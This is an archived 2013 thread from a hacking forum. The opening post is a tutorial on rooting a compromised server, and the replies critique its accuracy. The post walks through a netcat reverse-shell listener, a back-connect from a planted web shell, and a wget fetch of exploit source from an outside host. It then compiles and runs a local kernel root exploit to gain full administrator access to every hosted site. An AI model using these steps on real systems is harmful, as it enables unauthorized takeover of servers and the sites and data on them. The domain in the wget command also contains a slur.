+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Tutorial How To Root A Server. (/Thread-Tutorial-How-To-Root-A-Server)
How To Root A Server. - Nefarious - 08-10-2013
After actually reading my tutorial again, it's very shitty. You should find a better one until I can make a good one.
Note this thread looks very ugly, sorry.
Hey guys, today I'll be teaching you how to root a server using a local root exploit.
What is rooting?
Rooting is gaining access to the servers root(admin) account. If done correctly you will have access to every site on the compromised server.
Back connecting.
What you will need.
Netcat
Local Root Exploit.
(The script provided is called Enlightenment, it should work on kernels older than may 14th.)
Back Connect Shell
Netcat
Local Root Exploit.
(The script provided is called Enlightenment, it should work on kernels older than may 14th.)
Back Connect Shell
So once we are in the server you will need to start up netcat.
We will do this using command prompt.
Go to the directory netcat is in.
Then do:
Then do:
Code:
nc.exeNow you should see this.
![[Image: cd76bb9892.png]](http://puu.sh/3YnOy/cd76bb9892.png)
Now we want to have netcat listen on our port.
To do that we will use this command.
Now we want to have netcat listen on our port.
To do that we will use this command.
Code:
-lvp (open port)You should now see the following.
![[Image: c2e0093eb8.png]](http://puu.sh/3YnWn/c2e0093eb8.png)
Now we want to go to our shell and back connect.
![[Image: 177435962e.png]](http://puu.sh/3Yoj6/177435962e.png)
If it worked you should see the connection in CMD.
![[Image: 3617c22453.png]](http://puu.sh/3YohB/3617c22453.png)
Now type uname -a into CMD and hit enter.
You can google parts of the uname to find the right exploit.
You can check exploit-DB or 1337day.
Compiling and running the exploit
Now you need to upload the exploit, you can do this using your shell or wget.
Code:
wget http://nignog.com/tutorial/sinister.cOnce the exploit is uploaded we need to chmod it to 777.
Code:
chmod 777 sinister.cNow we want to compile and run the exploit.
Code:
gcc -o sinister sinister.cTo run the exploit.
Code:
./sinisterNow if it all worked out you should be root. Type "whoami" and it should say root.
RE: How To Root A Server. - Asuna - 08-10-2013
A lot of people won't know how to get into the server to begin with, but this is still a nice tutorial.
RE: How To Root A Server. - Complibur - 08-10-2013
Inb4dymecorrectsyousomehow
RE: How To Root A Server. - Dismas - 08-10-2013
I think what you're talking about is vulnerable kernels. In that case, it generally depends on the version (sometimes they backport privilege-escalation vulnerabilities). There are plenty of scripts out there, but you didn't really provide one.
RE: How To Root A Server. - w00t - 08-10-2013
Is there some reason you think you need all users to be able to read, write, and execute your downloaded source? By default, wget makes it readable for you, so you don't need to chmod it.
RE: How To Root A Server. - Dyme - 08-10-2013
This should be called "How to use netcat and gcc".
RE: How To Root A Server. - Reiko - 10-04-2013
There's a few things wrong with this and I'm going to try to criticize constructively so you can improve.
One: there's several versions of Netcat, and they behave a bit differently. If -vlp doesn't work, try just -vl.
Two: Some systems don't actually have wget or a compiler. What do we do in that situation?
(I'll leave the answer up to the reader. Kirito, if you need help with this PM me. Anyone else, go away and stop being a skad.)
Three: as mentioned above, chmod 777 is unnecessary.
Four: You're making assumptions about the reader's choice of operating system. Genericize your tutorial.
Five: This actually isn't going to work exactly like this with Enlightenment. You'd want to extract the .tar.gz provided and run one of the .sh scripts contained therein, which compile and run the 'sploits for you.
RE: How To Root A Server. - Cressi - 10-04-2013
Not 100% percent, but still a fantastic tutorial ^^
RE: How To Root A Server. - Charon - 10-04-2013
(10-04-2013, 09:01 PM)cressi97 Wrote: Not 100% percent, but still a fantastic tutorial ^^
Please elaborate; why is this tutorial not '100%.' all I see is you spam-posting.
RE: How To Root A Server. - Nefarious - 10-04-2013
(10-04-2013, 08:22 PM)Starfall Wrote: There's a few things wrong with this and I'm going to try to criticize constructively so you can improve.
One: there's several versions of Netcat, and they behave a bit differently. If -vlp doesn't work, try just -vl.
Two: Some systems don't actually have wget or a compiler. What do we do in that situation?
(I'll leave the answer up to the reader. Kirito, if you need help with this PM me. Anyone else, go away and stop being a skad.)
Three: as mentioned above, chmod 777 is unnecessary.
Four: You're making assumptions about the reader's choice of operating system. Genericize your tutorial.
Five: This actually isn't going to work exactly like this with Enlightenment. You'd want to extract the .tar.gz provided and run one of the .sh scripts contained therein, which compile and run the 'sploits for you.
One: I was not aware of that at all, my apologies.
Two: Other than curl and wget I wouldn't know what to do, I've sent you a PM.
Four: Once I have familiarize myself with linux I'll add the correct commands.